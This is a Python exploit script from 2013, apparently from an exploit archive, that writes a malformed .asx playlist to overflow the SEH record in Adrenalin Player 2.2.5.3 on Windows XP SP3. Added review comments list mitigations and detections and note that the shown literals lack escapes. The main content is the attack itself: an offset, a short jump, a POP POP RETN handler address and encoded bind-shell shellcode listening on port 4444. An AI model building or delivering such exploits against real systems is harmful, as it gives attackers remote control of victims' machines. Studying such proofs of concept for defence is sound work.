
# Title : Adrenalin Player 2.2.5.3 (.asx) - SEH Buffer Overflow
# Published : 2013-06-21
# Author :


# ======================================================================================#
# !/usr/bin/python									#
# Title:                Adrenalin Player (.asx) - SEH Buffer Overflow 			#
# software: 		Adrenalin Player						#
# version : 		2.2.5.3								#
# Platform:             Windows XP sp3							#
# Date:                 June 18th, 2013							#
# Author:               onying (@onyiing)						#
# Blog :		http://itsecuritynewbie.blogspot.com/ 				#
# Thanks to:            Information Security Shinobi Camp | http://www.is2c-dojo.com 	#
# ======================================================================================#
# Builds a malformed .asx playlist ("adrenalin.asx") whose body is one long
# string placed inside the <asx> element. Per the header above, the target is
# Adrenalin Player 2.2.5.3 on Windows XP SP3 and the bug class is a stack
# overflow that reaches the structured exception handler (SEH) record.
#
# NOTE(review): as reproduced on this page the string literals carry no
# backslash escapes, so they are plain text rather than raw bytes. Read the
# script as an illustration of the file layout, not as a byte-accurate copy.
#
# Defensive takeaways from the layout below:
#   * The handler address is taken from the application's own AdrenalinX.dll,
#     which suggests that module is not covered by SafeSEH -- TODO confirm.
#     SafeSEH on every loaded module, SEHOP on Windows versions that provide
#     it, DEP and ASLR are the standard mitigations for this pattern.
#   * A playlist with thousands of non-XML characters directly inside the
#     <asx> tag is anomalous and can be flagged by content inspection.
#   * The author's payload comment states a bind listener on TCP 4444, so a
#     media-player process opening a listening socket is a usable detection.

# Opening tag of the ASX playlist; everything after it is the oversized body.
header="<asx version = 3.0 > "
# Filler repeated 2079 times; presumably the distance from the start of the
# buffer to the SEH record -- the offset is the author's, not derivable here.
junk= "x90" * 2079
# Two 4-unit fields appended back to back, labelled by the author as the
# short jump and the handler address of the overwritten SEH record.
junk+="xebx06x90x90" #jmp short (author's label; skips over the next field)
junk+="x13xf3x16x10" #POP POP RETN AdrenalinX.dll (author's label)
junk+="x90" * 16 # NOP padding before shellcode

# Author's description of the payload generator settings follows; the blob is
# encoded, so its behaviour cannot be read from the listing itself.
#win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=ShikataGaNa
junk+=("xbbx25xaaxd2xa3x2bxc9xdaxd6xd9x74x24xf4x5exb1x51"
"x31x5ex10x83xeexfcx03x7bxa6x30x56x7fxdcx5fxd4x97"
"xd8x5fx18x98x7bx2bx8bx42x58xa0x11xb6x2bxcax9cxbe"
"x2axdcx14x71x35xa9x74xadx44x46xc3x26x72x13xd5xd6"
"x4axe3x4fx8ax29x23x1bxd5xf0x6exe9xd8x30x85x06xe1"
"xe0x7excfx60xecxf4x50xaexefxe1x09x25xe3xbex5ex66"
"xe0x41x8ax9bx34xc9xc5xf7x60xd1xb4xc4x58x32x52x41"
"xd9xf4x10x15xd2x7fx56x89x47xf4xd7xb9xc9x63x56xf7"
"xfbx9fx36xf8xd2x06xe4x60xb3xf5x38x04x34x89x0ex8b"
"xeex92xbfx5bxc4x80xbcxa0x8axa5xebx89xa3xbfx72xb4"
"x59x37x79xe3xcbx4ax82xdbx64x92x75x2exd9x73x79x06"
"x71x2fxd6xf5x25x8cx8bxbax9axedxfcx5ax75x03xa1xc4"
"xd6xaaxb8x9dxb1x08x20xedx86x06xaaxdbx63xb9x05xb6"
"x8cx69xcdx9cxdexa4xe7x8bxdfx6fxa4x66xdfx40x23x6d"
"x56xe7xfdx3ax96x31xadx90x3cxebxb1xc8x2ex7bxa9x91"
"x96x05x62x9exc1xa3x73xb0x88x21xe8x56x3dxd5x9dx1f"
"x58x73x0ex46x8ax48x27x9fxa6x14xb1xbdx06x55x32xeb"
"x97x17x98x15x25xb4x71x64xd0xfcxdexddx8ex95x52xdf"
"x62x73x6cx6axc1x83x44xcfx9ex29x38xbex71xa4xbbx11"
"x23x6dxedx6ex13xe5xa0x49x91x38xe9x96x4cxaexf1x97"
"x46xd0xdexecxfexd2x5cx36x64xd4xb5xe4x9axfax52x76"
"xbdx19xd1xd5xc2x08xe9x09")
# Trailing filler sized from len(junk) against a fixed total of 3000; if junk
# is already longer than 3000 the repeat count is negative and nothing is added.
junk+= "x90" * (3000-len(junk))
# Closing tag, so the file still looks like a well-formed ASX wrapper.
footer="</asx>"
# Writes the playlist to the current working directory in text mode.
# NOTE(review): `file` shadows the Python 2 builtin of the same name, and the
# handle is closed manually rather than through a `with` block.
file = open("adrenalin.asx","w")
file.write(header+junk+footer)
file.close()